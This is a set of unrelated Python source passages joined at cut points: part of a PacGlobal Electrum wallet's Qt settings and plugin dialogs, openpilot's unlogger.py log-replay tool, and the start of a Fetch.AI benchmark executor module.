will be displayed as "1.00"') nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help) nz = QSpinBox() nz.setMinimum(0) nz.setMaximum(self.decimal_point) nz.setValue(self.num_zeros) if not self.config.is_modifiable('num_zeros'): for w in [nz, nz_label]: w.setEnabled(False) def on_nz(): value = nz.value() if self.num_zeros != value: self.num_zeros = value self.config.set_key('num_zeros', value, True) self.history_list.update() self.address_list.update() nz.valueChanged.connect(on_nz) gui_widgets.append((nz_label, nz)) msg = '\n'.join([ _('Time based: fee rate is based on average confirmation time estimates'), ] ) fee_type_label = HelpLabel(_('Fee estimation') + ':', msg) fee_type_combo = QComboBox() fee_type_combo.addItems([_('Static'), _('ETA')]) fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0) def on_fee_type(x): self.config.set_key('mempool_fees', False) self.config.set_key('dynamic_fees', x>0) self.fee_slider.update() fee_type_combo.currentIndexChanged.connect(on_fee_type) fee_widgets.append((fee_type_label, fee_type_combo)) feebox_cb = QCheckBox(_('Edit fees manually')) feebox_cb.setChecked(self.config.get('show_fee', False)) feebox_cb.setToolTip(_("Show fee edit box in send tab.")) def on_feebox(x): self.config.set_key('show_fee', x == Qt.Checked) self.fee_adv_controls.setVisible(bool(x)) feebox_cb.stateChanged.connect(on_feebox) fee_widgets.append((feebox_cb, None)) msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\ + _('The following alias providers are available:') + '\n'\ + '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\ + 'For more information, see https://openalias.org' alias_label = HelpLabel(_('OpenAlias') + ':', msg) alias = self.config.get('alias','') alias_e = QLineEdit(alias) def set_alias_color(): if not self.config.get('alias'): alias_e.setStyleSheet("") return if self.alias_info: alias_addr, alias_name, validated = self.alias_info alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True)) else: alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True)) def on_alias_edit(): alias_e.setStyleSheet("") alias = str(alias_e.text()) self.config.set_key('alias', alias, True) if alias: self.fetch_alias() set_alias_color() self.alias_received_signal.connect(set_alias_color) alias_e.editingFinished.connect(on_alias_edit) id_widgets.append((alias_label, alias_e)) # SSL certificate msg = ' '.join([ _('SSL certificate used to sign payment requests.'), _('Use setconfig to set ssl_chain and ssl_privkey.'), ]) if self.config.get('ssl_privkey') or self.config.get('ssl_chain'): try: SSL_identity = paymentrequest.check_ssl_config(self.config) SSL_error = None except BaseException as e: SSL_identity = "error" SSL_error = str(e) else: SSL_identity = "" SSL_error = None SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg) SSL_id_e = QLineEdit(SSL_identity) SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '') if SSL_error: SSL_id_e.setToolTip(SSL_error) SSL_id_e.setReadOnly(True) id_widgets.append((SSL_id_label, SSL_id_e)) units = base_units_list msg = (_('Base unit of your wallet.') + '\n1 PAC = 1000 mPAC. 1 mPAC = 1000 uPAC. 
1 uPAC = 100 duffs.\n' + _('This setting affects the Send tab, and all balance related fields.')) unit_label = HelpLabel(_('Base unit') + ':', msg) unit_combo = QComboBox() unit_combo.addItems(units) unit_combo.setCurrentIndex(units.index(self.base_unit())) def on_unit(x, nz): unit_result = units[unit_combo.currentIndex()] if self.base_unit() == unit_result: return edits = self.amount_e, self.fee_e, self.receive_amount_e amounts = [edit.get_amount() for edit in edits] self.decimal_point = base_unit_name_to_decimal_point(unit_result) self.config.set_key('decimal_point', self.decimal_point, True) nz.setMaximum(self.decimal_point) self.history_list.update() self.request_list.update() self.address_list.update() for edit, amount in zip(edits, amounts): edit.setAmount(amount) self.update_status() unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz)) gui_widgets.append((unit_label, unit_combo)) show_dip2_cb = QCheckBox(_('Show DIP2 tx type in wallet history:')) show_dip2_cb.setChecked(self.config.get('show_dip2_tx_type', False)) def on_dip2_state_changed(x): show_dip2 = (x == Qt.Checked) self.config.set_key('show_dip2_tx_type', show_dip2, True) self.history_model.refresh('on_dip2') show_dip2_cb.stateChanged.connect(on_dip2_state_changed) gui_widgets.append((show_dip2_cb, None)) block_explorers = sorted(util.block_explorer_info().keys()) msg = _('Choose which online block explorer to use for functions that open a web browser') block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg) block_ex_combo = QComboBox() block_ex_combo.addItems(block_explorers) block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config))) def on_be(x): be_result = block_explorers[block_ex_combo.currentIndex()] self.config.set_key('block_explorer', be_result, True) block_ex_combo.currentIndexChanged.connect(on_be) gui_widgets.append((block_ex_label, block_ex_combo)) from electrum_dash import qrscanner system_cameras = qrscanner._find_system_cameras() qr_combo = QComboBox() qr_combo.addItem("Default","default") for camera, device in system_cameras.items(): qr_combo.addItem(camera, device) #combo.addItem("Manually specify a device", config.get("video_device")) index = qr_combo.findData(self.config.get("video_device")) qr_combo.setCurrentIndex(index) msg = _("Install the zbar package to enable this.") qr_label = HelpLabel(_('Video Device') + ':', msg) qr_combo.setEnabled(qrscanner.libzbar is not None) on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True) qr_combo.currentIndexChanged.connect(on_video_device) gui_widgets.append((qr_label, qr_combo)) colortheme_combo = QComboBox() colortheme_combo.addItem(_('Light'), 'default') colortheme_combo.addItem(_('Dark'), 'dark') index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'default')) colortheme_combo.setCurrentIndex(index) colortheme_label = QLabel(_('Color theme') + ':') def on_colortheme(x): self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True) self.need_restart = True colortheme_combo.currentIndexChanged.connect(on_colortheme) gui_widgets.append((colortheme_label, colortheme_combo)) updatecheck_cb = QCheckBox(_("Automatically check for software updates")) updatecheck_cb.setChecked(self.config.get('check_updates', False)) def on_set_updatecheck(v): self.config.set_key('check_updates', v == Qt.Checked, save=True) updatecheck_cb.stateChanged.connect(on_set_updatecheck) gui_widgets.append((updatecheck_cb, None)) filelogging_cb = QCheckBox(_("Write logs 
to file"))
        filelogging_cb.setChecked(bool(self.config.get('log_to_file', False)))
        def on_set_filelogging(v):
            self.config.set_key('log_to_file', v == Qt.Checked, save=True)
            self.need_restart = True
        filelogging_cb.stateChanged.connect(on_set_filelogging)
        filelogging_cb.setToolTip(_('Debug logs can be persisted to disk. These are useful for troubleshooting.'))
        gui_widgets.append((filelogging_cb, None))

        usechange_cb = QCheckBox(_('Use change addresses'))
        usechange_cb.setChecked(self.wallet.use_change)
        if not self.config.is_modifiable('use_change'):
            usechange_cb.setEnabled(False)
        def on_usechange(x):
            usechange_result = x == Qt.Checked
            if self.wallet.use_change != usechange_result:
                self.wallet.use_change = usechange_result
                self.wallet.storage.put('use_change', self.wallet.use_change)
                multiple_cb.setEnabled(self.wallet.use_change)
        usechange_cb.stateChanged.connect(on_usechange)
        usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
        tx_widgets.append((usechange_cb, None))

        def on_multiple(x):
            multiple = x == Qt.Checked
            if self.wallet.multiple_change != multiple:
                self.wallet.multiple_change = multiple
                self.wallet.storage.put('multiple_change', multiple)
        multiple_change = self.wallet.multiple_change
        multiple_cb = QCheckBox(_('Use multiple change addresses'))
        multiple_cb.setEnabled(self.wallet.use_change)
        multiple_cb.setToolTip('\n'.join([
            _('In some cases, use up to 3 change addresses in order to break '
              'up large coin amounts and obfuscate the recipient address.'),
            _('This may result in higher transaction fees.')
        ]))
        multiple_cb.setChecked(multiple_change)
        multiple_cb.stateChanged.connect(on_multiple)
        tx_widgets.append((multiple_cb, None))

        def fmt_docs(key, klass):
            lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
            return '\n'.join([key, "", " ".join(lines)])

        choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
        if len(choosers) > 1:
            chooser_name = coinchooser.get_name(self.config)
            msg = _('Choose coin (UTXO) selection method.
The following are available:\n\n') msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items()) chooser_label = HelpLabel(_('Coin selection') + ':', msg) chooser_combo = QComboBox() chooser_combo.addItems(choosers) i = choosers.index(chooser_name) if chooser_name in choosers else 0 chooser_combo.setCurrentIndex(i) def on_chooser(x): chooser_name = choosers[chooser_combo.currentIndex()] self.config.set_key('coin_chooser', chooser_name) chooser_combo.currentIndexChanged.connect(on_chooser) tx_widgets.append((chooser_label, chooser_combo)) def on_unconf(x): self.config.set_key('confirmed_only', bool(x)) conf_only = self.config.get('confirmed_only', False) unconf_cb = QCheckBox(_('Spend only confirmed coins')) unconf_cb.setToolTip(_('Spend only confirmed inputs.')) unconf_cb.setChecked(conf_only) unconf_cb.stateChanged.connect(on_unconf) tx_widgets.append((unconf_cb, None)) def on_outrounding(x): self.config.set_key('coin_chooser_output_rounding', bool(x)) enable_outrounding = self.config.get('coin_chooser_output_rounding', False) outrounding_cb = QCheckBox(_('Enable output value rounding')) outrounding_cb.setToolTip( _('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' + _('This might improve your privacy somewhat.') + '\n' + _('If enabled, at most 100 duffs might be lost due to this, per transaction.')) outrounding_cb.setChecked(enable_outrounding) outrounding_cb.stateChanged.connect(on_outrounding) tx_widgets.append((outrounding_cb, None)) # Fiat Currency hist_checkbox = QCheckBox() hist_capgains_checkbox = QCheckBox() fiat_address_checkbox = QCheckBox() ccy_combo = QComboBox() ex_combo = QComboBox() def update_currencies(): if not self.fx: return currencies = sorted(self.fx.get_currencies(self.fx.get_history_config())) ccy_combo.clear() ccy_combo.addItems([_('None')] + currencies) if self.fx.is_enabled(): ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency())) def update_history_cb(): if not self.fx: return hist_checkbox.setChecked(self.fx.get_history_config()) hist_checkbox.setEnabled(self.fx.is_enabled()) def update_fiat_address_cb(): if not self.fx: return fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config()) def update_history_capgains_cb(): if not self.fx: return hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config()) hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked()) def update_exchanges(): if not self.fx: return b = self.fx.is_enabled() ex_combo.setEnabled(b) if b: h = self.fx.get_history_config() c = self.fx.get_currency() exchanges = self.fx.get_exchanges_by_ccy(c, h) else: exchanges = self.fx.get_exchanges_by_ccy('USD', False) ex_combo.blockSignals(True) ex_combo.clear() ex_combo.addItems(sorted(exchanges)) ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange())) ex_combo.blockSignals(False) def on_currency(hh): if not self.fx: return b = bool(ccy_combo.currentIndex()) ccy = str(ccy_combo.currentText()) if b else None self.fx.set_enabled(b) if b and ccy != self.fx.ccy: self.fx.set_currency(ccy) update_history_cb() update_exchanges() self.update_fiat() def on_exchange(idx): exchange = str(ex_combo.currentText()) if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name(): self.fx.set_exchange(exchange) def on_history(checked): if not self.fx: return self.fx.set_history_config(checked) update_exchanges() self.history_model.refresh('on_history') if self.fx.is_enabled() and checked: self.fx.trigger_update() 
update_history_capgains_cb() def on_history_capgains(checked): if not self.fx: return self.fx.set_history_capital_gains_config(checked) self.history_model.refresh('on_history_capgains') def on_fiat_address(checked): if not self.fx: return self.fx.set_fiat_address_config(checked) self.address_list.refresh_headers() self.address_list.update() update_currencies() update_history_cb() update_history_capgains_cb() update_fiat_address_cb() update_exchanges() ccy_combo.currentIndexChanged.connect(on_currency) hist_checkbox.stateChanged.connect(on_history) hist_capgains_checkbox.stateChanged.connect(on_history_capgains) fiat_address_checkbox.stateChanged.connect(on_fiat_address) ex_combo.currentIndexChanged.connect(on_exchange) fiat_widgets = [] fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo)) fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox)) fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox)) fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox)) fiat_widgets.append((QLabel(_('Source')), ex_combo)) tabs_info = [ (fee_widgets, _('Fees')), (tx_widgets, _('Transactions')), (gui_widgets, _('General')), (fiat_widgets, _('Fiat')), (id_widgets, _('Identity')), ] for widgets, name in tabs_info: tab = QWidget() grid = QGridLayout(tab) grid.setColumnStretch(0,1) for a,b in widgets: i = grid.rowCount() if b: if a: grid.addWidget(a, i, 0) grid.addWidget(b, i, 1) else: grid.addWidget(a, i, 0, 1, 2) tabs.addTab(tab, name) vbox.addWidget(tabs) vbox.addStretch(1) vbox.addLayout(Buttons(CloseButton(d))) d.setLayout(vbox) # run the dialog d.exec_() if self.fx: self.fx.trigger_update() self.alias_received_signal.disconnect(set_alias_color) run_hook('close_settings_dialog') if self.need_restart: self.show_warning(_('Please restart PacGlobal Electrum to activate the new GUI settings'), title=_('Success')) def closeEvent(self, event): # It seems in some rare cases this closeEvent() is called twice if not self.cleaned_up: self.cleaned_up = True self.clean_up() event.accept() def clean_up(self): self.wallet.thread.stop() if self.network: self.network.unregister_callback(self.on_network) self.network.unregister_callback(self.on_quotes) self.network.unregister_callback(self.on_history) self.wallet.protx_manager.clean_up() self.network.dash_net.unregister_callback(self.on_dash_net) self.config.set_key("is_maximized", self.isMaximized()) if not self.isMaximized(): g = self.geometry() self.wallet.storage.put("winpos-qt", [g.left(),g.top(), g.width(),g.height()]) self.config.set_key("console-history", self.console.history[-50:], True) if self.qr_window: self.qr_window.close() self.close_wallet() self.gui_object.timer.timeout.disconnect(self.timer_actions) self.gui_object.close_window(self) def plugins_dialog(self): self.pluginsdialog = d = WindowModalDialog(self, _('PacGlobal Electrum Plugins')) plugins = self.gui_object.plugins vbox = QVBoxLayout(d) # plugins scroll = QScrollArea() scroll.setEnabled(True) scroll.setWidgetResizable(True) scroll.setMinimumSize(400,250) vbox.addWidget(scroll) w = QWidget() scroll.setWidget(w) w.setMinimumHeight(plugins.count() * 35) grid = QGridLayout() grid.setColumnStretch(0,1) w.setLayout(grid) settings_widgets = {} def enable_settings_widget(p, name, i): widget = settings_widgets.get(name) if not widget and p and p.requires_settings(): widget = settings_widgets[name] = p.settings_widget(d) grid.addWidget(widget, i, 1) if widget: widget.setEnabled(bool(p and p.is_enabled())) def 
do_toggle(cb, name, i): p = plugins.toggle(name) cb.setChecked(bool(p)) enable_settings_widget(p, name, i) run_hook('init_qt', self.gui_object) for i, descr in enumerate(plugins.descriptions.values()): full_name = descr['__name__'] prefix, _separator, name = full_name.rpartition('.') p = plugins.get(name) if descr.get('registers_keystore'): continue try: cb = QCheckBox(descr['fullname']) plugin_is_loaded = p is not None cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet) or plugin_is_loaded and p.can_user_disable()) cb.setEnabled(cb_enabled) cb.setChecked(plugin_is_loaded and p.is_enabled()) grid.addWidget(cb, i, 0) enable_settings_widget(p, name, i) cb.clicked.connect(partial(do_toggle, cb, name, i)) msg = descr['description'] if descr.get('requires'): msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires'))) grid.addWidget(HelpButton(msg), i, 2) except Exception: self.logger.exception(f"cannot display plugin {name}") grid.setRowStretch(len(plugins.descriptions.values()), 1) vbox.addLayout(Buttons(CloseButton(d))) d.exec_() def save_transaction_into_wallet(self, tx): win = self.top_level_window() try: if not self.wallet.add_transaction(tx.txid(), tx): win.show_error(_("Transaction could not be saved.") + "\n" + _("It conflicts with current history.")) return False except AddTransactionException as e: win.show_error(e) return False else: self.wallet.storage.write() # need to update at least: history_list, utxo_list, address_list self.need_update.set() msg = (_("Transaction added to wallet history.") + '\n\n' + _("Note: this is an offline transaction, if you want the network " "to see it, you need to broadcast it.")) win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg) return True def show_masternode_dialog(self): d = MasternodeDialog(self.masternode_manager, self) d.exec_() def proposals_changed(self): """Callback for when proposals change.""" if not self.masternode_manager: return self.update_proposals_tab()
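# A minimal sketch (not part of the settings dialog above) of the recurring
# checkbox-to-config pattern it uses: a QCheckBox whose stateChanged handler
# persists a boolean key via config.set_key(..., save=True). The helper name
# make_config_checkbox and the 'example_flag' key are hypothetical, added only
# for illustration.
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QCheckBox


def make_config_checkbox(config, key, label, default=False):
    """Return a QCheckBox that mirrors and persists config.get(key)."""
    cb = QCheckBox(label)
    cb.setChecked(bool(config.get(key, default)))

    def on_state_changed(state):
        # stateChanged delivers an int; Qt.Checked compares equal when ticked.
        config.set_key(key, state == Qt.Checked, save=True)

    cb.stateChanged.connect(on_state_changed)
    return cb

# Usage (hypothetical): gui_widgets.append(
#     (make_config_checkbox(self.config, 'example_flag', 'Example option'), None))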
unlogger.py
#!/usr/bin/env python import argparse import os import sys import zmq import time import gc import signal from threading import Thread import numpy as np from uuid import uuid4 from collections import namedtuple from collections import deque from multiprocessing import Process, TimeoutError from datetime import datetime # strat 1: script to copy files # strat 2: build pip packages around these # could be its own pip package, which we'd need to build and release from cereal import log as capnp_log from cereal.services import service_list from cereal.messaging import pub_sock from common import realtime from tools.lib.file_helpers import mkdirs_exists_ok from tools.lib.kbhit import KBHit from tools.lib.logreader import MultiLogIterator from tools.lib.route import Route from tools.lib.route_framereader import RouteFrameReader # Commands. SetRoute = namedtuple("SetRoute", ("name", "start_time", "data_dir")) SeekAbsoluteTime = namedtuple("SeekAbsoluteTime", ("secs",)) SeekRelativeTime = namedtuple("SeekRelativeTime", ("secs",)) TogglePause = namedtuple("TogglePause", ()) StopAndQuit = namedtuple("StopAndQuit", ()) class UnloggerWorker(object): def __init__(self): self._frame_reader = None self._cookie = None self._readahead = deque() def run(self, commands_address, data_address, pub_types): zmq.Context._instance = None commands_socket = zmq.Context.instance().socket(zmq.PULL) commands_socket.connect(commands_address) data_socket = zmq.Context.instance().socket(zmq.PUSH) data_socket.connect(data_address) poller = zmq.Poller() poller.register(commands_socket, zmq.POLLIN) # We can't publish frames without encodeIdx, so add when it's missing. if "frame" in pub_types: pub_types["encodeIdx"] = None # gc.set_debug(gc.DEBUG_LEAK | gc.DEBUG_OBJECTS | gc.DEBUG_STATS | gc.DEBUG_SAVEALL | # gc.DEBUG_UNCOLLECTABLE) # TODO: WARNING pycapnp leaks memory all over the place after unlogger runs for a while, gc # pauses become huge because there are so many tracked objects solution will be to switch to new # cython capnp try: route = None while True: while poller.poll(0.) or route is None: cookie, cmd = commands_socket.recv_pyobj() route = self._process_commands(cmd, route) # **** get message **** self._read_logs(cookie, pub_types) self._send_logs(data_socket) finally: if self._frame_reader is not None: self._frame_reader.close() data_socket.close() commands_socket.close() def _read_logs(self, cookie, pub_types): fullHEVC = capnp_log.EncodeIndex.Type.fullHEVC lr = self._lr while len(self._readahead) < 1000: route_time = lr.tell() msg = next(lr) typ = msg.which() if typ not in pub_types: continue # **** special case certain message types **** if typ == "encodeIdx" and msg.encodeIdx.type == fullHEVC: # this assumes the encodeIdx always comes before the frame self._frame_id_lookup[ msg.encodeIdx.frameId] = msg.encodeIdx.segmentNum, msg.encodeIdx.segmentId #print "encode", msg.encodeIdx.frameId, len(self._readahead), route_time self._readahead.appendleft((typ, msg, route_time, cookie)) def _send_logs(self, data_socket): while len(self._readahead) > 500: typ, msg, route_time, cookie = self._readahead.pop() smsg = msg.as_builder() if typ == "frame": frame_id = msg.frame.frameId # Frame exists, make sure we have a framereader. 
# load the frame readers as needed s1 = time.time() img = self._frame_reader.get(frame_id, pix_fmt="rgb24") fr_time = time.time() - s1 if fr_time > 0.05: print("FRAME(%d) LAG -- %.2f ms" % (frame_id, fr_time*1000.0)) if img is not None: img = img[:, :, ::-1] # Convert RGB to BGR, which is what the camera outputs img = img.flatten() smsg.frame.image = img.tobytes() data_socket.send_pyobj((cookie, typ, msg.logMonoTime, route_time), flags=zmq.SNDMORE) data_socket.send(smsg.to_bytes(), copy=False) def _process_commands(self, cmd, route): seek_to = None if route is None or (isinstance(cmd, SetRoute) and route.name != cmd.name): seek_to = cmd.start_time route = Route(cmd.name, cmd.data_dir) self._lr = MultiLogIterator(route.log_paths(), wraparound=True) if self._frame_reader is not None: self._frame_reader.close() # reset frames for a route self._frame_id_lookup = {} self._frame_reader = RouteFrameReader( route.camera_paths(), None, self._frame_id_lookup, readahead=True) # always reset this on a seek if isinstance(cmd, SeekRelativeTime): seek_to = self._lr.tell() + cmd.secs elif isinstance(cmd, SeekAbsoluteTime): seek_to = cmd.secs elif isinstance(cmd, StopAndQuit): exit() if seek_to is not None: print("seeking", seek_to) if not self._lr.seek(seek_to): print("Can't seek: time out of bounds") else: next(self._lr) # ignore one return route def _get_address_send_func(address): sock = pub_sock(address) return sock.send def unlogger_thread(command_address, forward_commands_address, data_address, run_realtime, address_mapping, publish_time_length, bind_early, no_loop): # Clear context to avoid problems with multiprocessing. zmq.Context._instance = None context = zmq.Context.instance() command_sock = context.socket(zmq.PULL) command_sock.bind(command_address) forward_commands_socket = context.socket(zmq.PUSH) forward_commands_socket.bind(forward_commands_address) data_socket = context.socket(zmq.PULL) data_socket.bind(data_address) # Set readahead to a reasonable number. data_socket.setsockopt(zmq.RCVHWM, 10000) poller = zmq.Poller() poller.register(command_sock, zmq.POLLIN) poller.register(data_socket, zmq.POLLIN) if bind_early: send_funcs = { typ: _get_address_send_func(address) for typ, address in address_mapping.items() } # Give subscribers a chance to connect. time.sleep(0.1) else: send_funcs = {} start_time = float("inf") printed_at = 0 generation = 0 paused = False reset_time = True prev_msg_time = None while True: evts = dict(poller.poll()) if command_sock in evts: cmd = command_sock.recv_pyobj() if isinstance(cmd, TogglePause): paused = not paused if paused: poller.modify(data_socket, 0) else: poller.modify(data_socket, zmq.POLLIN) else: # Forward the command the the log data thread. # TODO: Remove everything on data_socket. generation += 1 forward_commands_socket.send_pyobj((generation, cmd)) if isinstance(cmd, StopAndQuit): return reset_time = True elif data_socket in evts: msg_generation, typ, msg_time, route_time = data_socket.recv_pyobj(flags=zmq.RCVMORE) msg_bytes = data_socket.recv() if msg_generation < generation: # Skip packets. 
continue if no_loop and prev_msg_time is not None and prev_msg_time > msg_time + 1e9: generation += 1 forward_commands_socket.send_pyobj((generation, StopAndQuit())) return prev_msg_time = msg_time msg_time_seconds = msg_time * 1e-9 if reset_time: msg_start_time = msg_time_seconds real_start_time = realtime.sec_since_boot() start_time = min(start_time, msg_start_time) reset_time = False if publish_time_length and msg_time_seconds - start_time > publish_time_length: generation += 1 forward_commands_socket.send_pyobj((generation, StopAndQuit())) return # Print time. if abs(printed_at - route_time) > 5.: print("at", route_time) printed_at = route_time if typ not in send_funcs: if typ in address_mapping: # Remove so we don't keep printing warnings. address = address_mapping.pop(typ) try: print("binding", typ) send_funcs[typ] = _get_address_send_func(address) except Exception as e: print("couldn't replay {}: {}".format(typ, e)) continue else: # Skip messages that we are not registered to publish. continue # Sleep as needed for real time playback. if run_realtime: msg_time_offset = msg_time_seconds - msg_start_time real_time_offset = realtime.sec_since_boot() - real_start_time lag = msg_time_offset - real_time_offset if lag > 0 and lag < 30: # a large jump is OK, likely due to an out of order segment if lag > 1: print("sleeping for", lag) time.sleep(lag) elif lag < -1: # Relax the real time schedule when we slip far behind. reset_time = True # Send message. send_funcs[typ](msg_bytes) def timestamp_to_s(tss): return time.mktime(datetime.strptime(tss, '%Y-%m-%d--%H-%M-%S').timetuple()) def absolute_time_str(s, start_time): try: # first try if it's a float return float(s) except ValueError: # now see if it's a timestamp return timestamp_to_s(s) - start_time def _get_address_mapping(args): if args.min is not None: services_to_mock = [ 'thermal', 'can', 'health', 'sensorEvents', 'gpsNMEA', 'frame', 'encodeIdx', 'model', 'features', 'liveLocation', 'gpsLocation' ] elif args.enabled is not None: services_to_mock = args.enabled else: services_to_mock = service_list.keys() address_mapping = {service_name: service_name for service_name in services_to_mock} address_mapping.update(dict(args.address_mapping)) for k in args.disabled: address_mapping.pop(k, None) non_services = set(address_mapping) - set(service_list) if non_services: print("WARNING: Unknown services {}".format(list(non_services))) return address_mapping def keyboard_controller_thread(q, route_start_time): print("keyboard waiting for input") kb = KBHit() while 1: c = kb.getch() if c=='m': # Move forward by 1m q.send_pyobj(SeekRelativeTime(60)) elif c=='M': # Move backward by 1m q.send_pyobj(SeekRelativeTime(-60)) elif c=='s': # Move forward by 10s q.send_pyobj(SeekRelativeTime(10)) elif c=='S': # Move backward by 10s q.send_pyobj(SeekRelativeTime(-10)) elif c=='G': # Move backward by 10s q.send_pyobj(SeekAbsoluteTime(0.)) elif c=="\x20": # Space bar. 
q.send_pyobj(TogglePause()) elif c=="\n": try: seek_time_input = raw_input('time: ') seek_time = absolute_time_str(seek_time_input, route_start_time) q.send_pyobj(SeekAbsoluteTime(seek_time)) except Exception as e: print("Time not understood: {}".format(e)) def get_arg_parser(): parser = argparse.ArgumentParser( description="Mock openpilot components by publishing logged messages.", formatter_class=argparse.ArgumentDefaultsHelpFormatter) parser.add_argument("route_name", type=(lambda x: x.replace("#", "|")), nargs="?", help="The route whose messages will be published.") parser.add_argument("data_dir", nargs='?', default=os.getenv('UNLOGGER_DATA_DIR'), help="Path to directory in which log and camera files are located.") parser.add_argument("--no-loop", action="store_true", help="Stop at the end of the replay.") key_value_pair = lambda x: x.split("=") parser.add_argument("address_mapping", nargs="*", type=key_value_pair, help="Pairs <service>=<zmq_addr> to publish <service> on <zmq_addr>.") comma_list = lambda x: x.split(",") to_mock_group = parser.add_mutually_exclusive_group() to_mock_group.add_argument("--min", action="store_true", default=os.getenv("MIN")) to_mock_group.add_argument("--enabled", default=os.getenv("ENABLED"), type=comma_list) parser.add_argument("--disabled", type=comma_list, default=os.getenv("DISABLED") or ()) parser.add_argument( "--tl", dest="publish_time_length", type=float, default=None, help="Length of interval in event time for which messages should be published.") parser.add_argument( "--no-realtime", dest="realtime", action="store_false", default=True, help="Publish messages as quickly as possible instead of realtime.") parser.add_argument( "--no-interactive", dest="interactive", action="store_false", default=True, help="Disable interactivity.") parser.add_argument( "--bind-early", action="store_true", default=False, help="Bind early to avoid dropping messages.") return parser def main(argv): args = get_arg_parser().parse_args(sys.argv[1:]) command_address = "ipc:///tmp/{}".format(uuid4()) forward_commands_address = "ipc:///tmp/{}".format(uuid4()) data_address = "ipc:///tmp/{}".format(uuid4()) address_mapping = _get_address_mapping(args) command_sock = zmq.Context.instance().socket(zmq.PUSH) command_sock.connect(command_address) if args.route_name is not None: route_name_split = args.route_name.split("|") if len(route_name_split) > 1: route_start_time = timestamp_to_s(route_name_split[1]) else: route_start_time = 0 command_sock.send_pyobj( SetRoute(args.route_name, 0, args.data_dir)) else: print("waiting for external command...") route_start_time = 0 subprocesses = {} try: subprocesses["data"] = Process( target=UnloggerWorker().run, args=(forward_commands_address, data_address, address_mapping.copy())) subprocesses["control"] = Process( target=unlogger_thread, args=(command_address, forward_commands_address, data_address, args.realtime, _get_address_mapping(args), args.publish_time_length, args.bind_early, args.no_loop)) for p in subprocesses.values(): p.daemon = True subprocesses["data"].start() subprocesses["control"].start() # Exit if any of the children die. def exit_if_children_dead(*_): for name, p in subprocesses.items(): if not p.is_alive(): [p.terminate() for p in subprocesses.values()] exit() signal.signal(signal.SIGCHLD, signal.SIGIGN) signal.signal(signal.SIGCHLD, exit_if_children_dead) if args.interactive: keyboard_controller_thread(command_sock, route_start_time) else: # Wait forever for children. while True: time.sleep(10000.) 
  finally:
    for p in subprocesses.values():
      if p.is_alive():
        # Give the child up to 3 seconds to exit, then terminate it if it is
        # still alive (Process.join() never raises on timeout).
        p.join(3.)
        if p.is_alive():
          p.terminate()


if __name__ == "__main__":
  sys.exit(main(sys.argv[1:]))
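# A minimal sketch (not part of unlogger.py above) of its control channel:
# commands are plain namedtuples pushed with send_pyobj() over a zmq PUSH
# socket and read with recv_pyobj() on the PULL side, just as main() and
# unlogger_thread() do. It assumes it sits next to the SeekRelativeTime and
# TogglePause definitions above; the ipc path here is illustrative only -- the
# real address is generated with uuid4() in main().
import zmq


def control_channel_demo(address="ipc:///tmp/unlogger_demo"):
  context = zmq.Context.instance()
  pull_sock = context.socket(zmq.PULL)
  pull_sock.bind(address)

  push_sock = context.socket(zmq.PUSH)
  push_sock.connect(address)

  # The same objects keyboard_controller_thread() sends on key presses.
  push_sock.send_pyobj(SeekRelativeTime(60))
  push_sock.send_pyobj(TogglePause())

  print(pull_sock.recv_pyobj())  # SeekRelativeTime(secs=60)
  print(pull_sock.recv_pyobj())  # TogglePause()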
executor.py
# -*- coding: utf-8 -*- # ------------------------------------------------------------------------------ # # Copyright 2018-2019 Fetch.AI Limited # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # ------------------------------------------------------------------------------ """Executor to run and measure resources consumed by python code.""" import datetime import inspect import multiprocessing import time from collections import namedtuple from multiprocessing import Process from operator import attrgetter from statistics import mean from typing import Callable, List, Tuple import memory_profiler # type: ignore import psutil # type: ignore from benchmark.framework.benchmark import BenchmarkControl # noqa: I100 from tests.common.utils import timeit_context ResourceStats = namedtuple("ResourceStats", "time,cpu,mem") class ExecReport: """Process execution report.""" def __init__( self, args: tuple, time_passed: float, stats: List[ResourceStats], is_killed: bool, period: float, ): """Make an instance. :param args: tuple of arguments passed to function tested. :param time_passed: time test function was executed. :param stats: list of ResourceStats: cpu, mem. :param is_killed: was process 